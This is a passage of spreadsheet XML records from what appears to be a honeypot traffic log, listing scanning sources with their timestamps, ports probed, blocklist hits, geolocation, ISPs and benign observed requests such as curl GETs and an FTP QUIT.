    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kota Surabaya"/>
    <s v="Gubengairlangga"/>
    <s v="1985528"/>
    <s v="NA"/>
    <s v="-7.28145"/>
    <s v="112.744"/>
    <s v="63491"/>
    <s v="Universitas Katolik Widya Mandala"/>
    <s v="Universitas Katolik Widya Mandala"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca2e:1a25"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2265"/>
    <x v="2265"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:30:09"/>
    <d v="2023-11-28T01:06:30"/>
    <d v="2025-04-11T08:30:09"/>
    <n v="210"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_FTP_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;36567&amp;&amp;57883&amp;&amp;57915&amp;&amp;57940&amp;&amp;57998&amp;&amp;51007&amp;&amp;51068&amp;&amp;65291"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="1999-08-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d323:8f58"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2266"/>
    <x v="2266"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:30:01"/>
    <d v="2023-10-06T03:21:00"/>
    <d v="2025-04-11T08:30:01"/>
    <n v="145"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_HTTP_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23140&amp;&amp;37033&amp;&amp;80&amp;&amp;110&amp;&amp;57084&amp;&amp;443&amp;&amp;56403&amp;&amp;56205&amp;&amp;55917&amp;&amp;52361"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': '103.211.202.140:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'cmd': 'User-Agent:'}}&amp;&amp;{Data_POP3:{'args': 'gzip', 'cmd': 'Accept-Encoding:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '5.253.43.207:110', 'cmd': 'Host:'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8557"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2267"/>
    <x v="2267"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:18:14"/>
    <d v="2024-06-30T00:44:36"/>
    <d v="2025-04-11T08:18:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="30338&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afce:fd05"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2268"/>
    <x v="2268"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:14:42"/>
    <d v="2025-04-11T08:14:42"/>
    <d v="2025-04-11T08:14:42"/>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f1:b555"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2269"/>
    <x v="2269"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:10:27"/>
    <d v="2025-03-07T22:09:43"/>
    <d v="2025-04-11T08:10:27"/>
    <n v="126"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="12552"/>
    <s v="GlobalConnect AB"/>
    <s v="GlobalConnect AB"/>
    <s v="hosting"/>
    <s v="Viasat Satellite Services AB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5857:394a"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2270"/>
    <x v="2270"/>
    <s v="60-249-252-249.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:10:11"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-11T08:10:11"/>
    <n v="501"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H14&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8685&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cf9:fcf9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2271"/>
    <x v="2271"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:09:43"/>
    <d v="2023-07-25T14:46:13"/>
    <d v="2025-04-11T08:09:43"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H42&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="123&amp;&amp;5900&amp;&amp;1080&amp;&amp;22&amp;&amp;631&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;56815&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS Tamilnadu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa5:ccd2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2272"/>
    <x v="2272"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:59:25"/>
    <d v="2025-04-11T07:58:29"/>
    <d v="2025-04-11T07:59:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.91746"/>
    <s v="107.619"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7da3:21c5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2273"/>
    <x v="2273"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:52:19"/>
    <d v="2025-01-20T00:55:15"/>
    <d v="2025-04-11T07:52:19"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits']}"/>
    <n v="34"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SU"/>
    <s v="North Sumatra"/>
    <s v="Kota Tanjung Balai"/>
    <s v="Tanjungbalai"/>
    <s v="1213547"/>
    <s v="NA"/>
    <s v="2.98084"/>
    <s v="99.7969"/>
    <s v="152073"/>
    <s v="PT Media Balai Nusa"/>
    <s v="PT Media Balai Nusa"/>
    <s v="business"/>
    <s v="PT Media Balai Nusa"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a013:1122"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2274"/>
    <x v="2274"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:43:28"/>
    <d v="2025-04-11T07:43:28"/>
    <d v="2025-04-11T07:43:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:fef7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2275"/>
    <x v="2275"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:41:26"/>
    <d v="2025-04-11T07:39:20"/>
    <d v="2025-04-11T07:41:26"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BA"/>
    <s v="Bali"/>
    <s v="Badung Regency"/>
    <s v="Jimbaran"/>
    <s v="1642467"/>
    <s v="NA"/>
    <s v="-8.79093"/>
    <s v="115.16"/>
    <s v="17451"/>
    <s v="BIZNET NETWORKS"/>
    <s v="BIZNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b6fd:b605"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2276"/>
    <x v="2276"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:28:06"/>
    <d v="2025-04-11T05:46:49"/>
    <d v="2025-04-11T07:28:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28"/>
    <s v="23&amp;&amp;45826"/>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2007-08-01"/>
    <s v="BB-Multiplay-Static"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:1e9e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2277"/>
    <x v="2277"/>
    <s v="ip174-66-138-42.sd.sd.cox.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:14:04"/>
    <d v="2025-04-11T00:42:22"/>
    <d v="2025-04-11T07:14:04"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="San Diego"/>
    <s v="Bonita"/>
    <s v="5329954"/>
    <s v="91908"/>
    <s v="32.6578"/>
    <s v="-117.03"/>
    <s v="22773"/>
    <s v="Cox Communications Inc."/>
    <s v="Cox Communications Inc."/>
    <s v="business"/>
    <s v="Cox Communications"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ae42:8a2a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2278"/>
    <x v="2278"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:11:13"/>
    <d v="2025-04-03T12:34:56"/>
    <d v="2025-04-11T07:11:13"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MD"/>
    <s v="Moldova"/>
    <s v="CU"/>
    <s v="Chișinău Municipality"/>
    <s v="NA"/>
    <s v="Chisinau"/>
    <s v="618426"/>
    <s v="MD-2000"/>
    <s v="46.9895"/>
    <s v="28.8602"/>
    <s v="200019"/>
    <s v="ALEXHOST SRL"/>
    <s v="Alexhost SRL"/>
    <s v="hosting"/>
    <s v="Alexhost SRL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e67:bc76"/>
    <s v="C-I&amp;&amp;C-U"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2279"/>
    <x v="2279"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T07:09:41"/>
    <d v="2025-04-11T07:09:41"/>
    <d v="2025-04-11T07:09:41"/>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dd:7022"/>
    <s v="C-I"/>
